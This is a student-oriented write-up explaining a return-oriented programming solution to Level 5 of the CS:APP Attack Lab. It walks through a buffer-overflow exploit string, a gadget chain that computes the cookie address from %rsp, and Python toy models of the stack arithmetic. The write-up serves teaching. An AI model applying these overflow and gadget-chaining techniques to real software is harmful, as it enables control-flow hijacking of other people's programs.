Attack Lab - Level 5 explained

Ning Wang has published a very good write-up (2022 update: web page is gone now) on his solutions to the Attack Lab from the CS:APP book. However, I thought his solution to Level 5 could do with a bit more elaboration for those who are struggling with this topic.

First, it is necessary to understand what ROP requires. An essential component of ROP is good luck, and lots of it. Without getting lucky, you may take more than 10^100 years to find a workable attack, if you find one at all. This, the authors of CS:APP did not mention. I also cannot comprehend why this exercise is given out as homework at CMU to be completed in a week (while there is plenty of homework from other courses too), without an intensive course in Intel assembler as a prerequisite.

Level 5 requires the same general logic as Level 3, which can be summarized as (pseudo code):

mov <cookiestring address>, %rdi //why? because touch3 is expecting it there
call touch3


To achieve the above for Level 5, the next level of elaboration would be:
  1. Put your cookie string somewhere on the stack, and note its (relative) position.
  2. Craft code to:
    1. Save the value of the stack pointer, %rsp, and determine the offset of the cookie string address from this run-time value of %rsp.
    2. Add the offset to the saved value of %rsp
    3. Transfer this sum to the register %rdi.
    4. Jump to touch3.

With ROP, you then try your luck searching for code fragments to achieve Step 2 above. It would be sensible to work "bottom up", i.e. start from the last instruction (the one just before the RETQ to touch3) and work backwards.

ROP requires finding fragments (I don't know why the lab calls them gadgets) that suit your purpose. You are at the mercy of what lucky sequences of bytes in the target program (or machine) can do. Sometimes a fragment may contain additional instructions that you don't want or need, but these can be ignored if they do not destroy any of your data.

In the simplest form, each code fragment has to end with a RETQ instruction. The RETQ instruction pops the top of the stack and jumps to the popped value. By lining up the addresses of such code fragments (gadgets) one after another on the stack, execution flows from one gadget to the next, and the last one passes control, in the same manner, to the function touch3.
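
To make the chaining concrete, here is a toy model in Python of how successive RETQ instructions walk down a list of addresses on the stack. It is only a sketch: the addresses and gadget names are made up for illustration, and the "gadgets" do nothing except return.

```python
# Toy model of RETQ chaining. All addresses and names here are hypothetical.

def run_chain(stack, gadgets):
    """Pop return addresses from `stack` until one is not a known gadget."""
    rsp = 0                      # index of the next 8-byte slot to pop
    trace = []
    while rsp < len(stack):
        target = stack[rsp]      # RETQ reads the slot %rsp points at ...
        rsp += 1                 # ... moves %rsp to the next slot ...
        name = gadgets.get(target)
        if name is None:         # not a gadget: treat it as the final function
            trace.append(hex(target))
            break
        trace.append(name)       # ... and jumps there; the gadget ends in RETQ too
    return trace

gadgets = {0x1000: "gadget A", 0x2000: "gadget B"}
stack = [0x1000, 0x2000, 0x3000]   # two gadget addresses, then the final target
print(run_chain(stack, gadgets))   # ['gadget A', 'gadget B', '0x3000']
```

The point of the model is that the attacker never injects code, only a list of addresses; the existing RETQ at the end of each fragment does the sequencing.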

Looking at Ning's solution, after getbuf() is called and the longer-than-expected exploit string is entered, control is passed to the address held in the sixth line of his exploit string. Sixth because the first five lines (totaling 40 bytes) fill the variable buf (see page 3 of the lab handout). (For CMU students, BUFFER_SIZE is different, so you have to adjust for this by adding or removing padding bytes.) The eight bytes on the sixth line (06 1a 40 00 00 00 00 00) overwrite the original value on the stack, which previously held the return address, i.e. the address of the instruction following the call to getbuf(). These eight bytes now hold the address of Gadget 1, stored least significant byte first. The rest of the exploit string that follows also overwrites the stack, into the parent's stack frame - a dangerous stunt indeed.
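
As a quick check of the byte order, the sketch below packs the Gadget 1 address as a little-endian 64-bit value and prepends the padding. The address 0x401a06 is read off the eight bytes quoted above; the 40-byte buffer size is the one used in this write-up and is an assumption for any other build, and the zero padding bytes are an arbitrary choice.

```python
import struct

BUFFER_SIZE = 40            # bytes of padding before the return address (assumed)
GADGET1_ADDR = 0x401a06     # from the bytes 06 1a 40 00 00 00 00 00

padding = b"\x00" * BUFFER_SIZE               # filler; any non-newline bytes would do
ret_slot = struct.pack("<Q", GADGET1_ADDR)    # "<Q" = little-endian unsigned 64-bit
payload_head = padding + ret_slot

print(ret_slot.hex(" "))    # 06 1a 40 00 00 00 00 00
print(len(payload_head))    # 48
```

Every later "line" of the exploit string (gadget addresses, the constant, the address of touch3) is packed the same way, eight bytes at a time.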

The solution by Ning uses the following logic (view this side-by-side with his annotated exploit string):

Note that what is not shown in Ning's comments is that every gadget ends with a RETQ instruction (opcode C3).

  1. Gadget 1: saves %rsp to %rax. At this point %rsp is pointing to the next "line" of the exploit string, i.e. the stack slot annotated as Gadget 2.
  2. Gadget 2: copies %rax to %rdi. %rdi then stays unchanged until Gadget 7 overwrites it, so in the meantime it points to the seventh "line" of the exploit string listing.
  3. Gadget 3: POPQ %rax moves the constant 0x00000040 (the value in the next "line" on the stack) into %rax. Why 64 (decimal)? There are 64 bytes, i.e. eight 8-byte lines, between the seventh line (where %rdi now points) and the cookie string at the bottom of the listing. The address of the cookie string is thus the saved %rsp plus 64, and the rest of the code basically jumps through hoops just to carry out this simple arithmetic operation.
  4. Gadget 3 continued: the next instruction in Gadget 3 swaps %eax with %edx. We DO NOT NEED this operation, but it is in the selected code fragment and we have no choice but to go along with it. Note that %eax is a 32-bit register, so only the lower 32 bits of %rax are used. As the value contained in %rax is 64 (which fits in a single byte), this has no impact.
  5. The POPQ instruction of Gadget 3 increments %rsp by 8 bytes - this is the nature of all POP instructions. The RETQ instruction in Gadget 3 carries out another POP operation, and thus %rsp is now pointing two "lines" down, at the address of Gadget 4.
  6. Gadget 4 and Gadget 5 are just making use of the (luckily) available code fragments to move that constant 64 into %rsi.
  7. Gadget 6: Perhaps there are no suitable ADD instructions in the "gadget factory", so the LEA instruction is used to add the required 64 (now in %rsi) to the saved value of %rsp (in %rdi from Gadget 2). LEA (%rdi, %rsi, 1), %rax computes %rdi + %rsi * 1 and stores the result in %rax, without accessing memory. %rax now contains the address of the cookie string!
  8. Gadget 7: Moves %rax to %rdi, and the RETQ transfers control to touch3.
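
The arithmetic in the steps above can be checked with a small Python model of the stack layout and registers. This is a sketch under assumptions: the slot names simply mirror the "lines" of the exploit string after the padding, the stack base address is made up, and each gadget is reduced to its net effect on the registers.

```python
SLOT = 8  # every "line" of the exploit string is one 8-byte stack slot

# Stack slots after the 40 bytes of padding, in order of increasing address.
chain = ["gadget1", "gadget2", "gadget3", "const 0x40", "gadget4",
         "gadget5", "gadget6", "gadget7", "touch3", "cookie string"]

# When Gadget 1 runs, RETQ has already popped its address,
# so %rsp points at the slot holding the address of Gadget 2.
offset = (chain.index("cookie string") - chain.index("gadget2")) * SLOT
print(offset, hex(offset))        # 64 0x40

base = 0x7FFE0000                 # hypothetical address of the first slot
addr = {name: base + i * SLOT for i, name in enumerate(chain)}

rax = addr["gadget2"]             # Gadget 1: %rsp -> %rax
rdi = rax                         # Gadget 2: %rax -> %rdi
rax = 0x40                        # Gadget 3: POPQ %rax loads the constant
rsi = rax & 0xFFFFFFFF            # Gadgets 3 to 5: 32-bit moves carry it into %esi
rax = rdi + rsi * 1               # Gadget 6: LEA (%rdi,%rsi,1), %rax
rdi = rax                         # Gadget 7: %rax -> %rdi

print(rdi == addr["cookie string"])   # True
```

If your exploit string has a different number of lines between Gadget 2 and the cookie string, the constant popped in Gadget 3 has to change accordingly.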

I hope you now have a better idea of how the Level 5 exploit works.
